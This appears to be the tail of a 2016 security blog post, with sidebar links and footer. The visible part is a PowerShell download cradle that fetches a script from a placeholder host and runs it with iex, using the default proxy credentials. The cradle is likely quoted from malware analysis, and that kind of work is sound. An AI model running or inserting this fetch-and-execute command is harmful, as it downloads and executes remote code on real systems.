$web=new-object system.net.webclient;
$web.proxy = [syste.net.webrequest]::defaultwebproxy;
$web.proxy.credentials = [system.net.credentialcache]::defaultnetworkcredentials;
char[]$x=([char[]]($web.downloadstring("http://X.X.X.X/file.asp")));
iex ($x-join)
More about neonprimetime
Top Blogs of all-time
- pagerank botnet sql injection walk-thru
- DOM XSS 101 Walk-Through
- An Invoice email and a Hot mess of Java
Top Github Contributions
Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.
No comments:
Post a Comment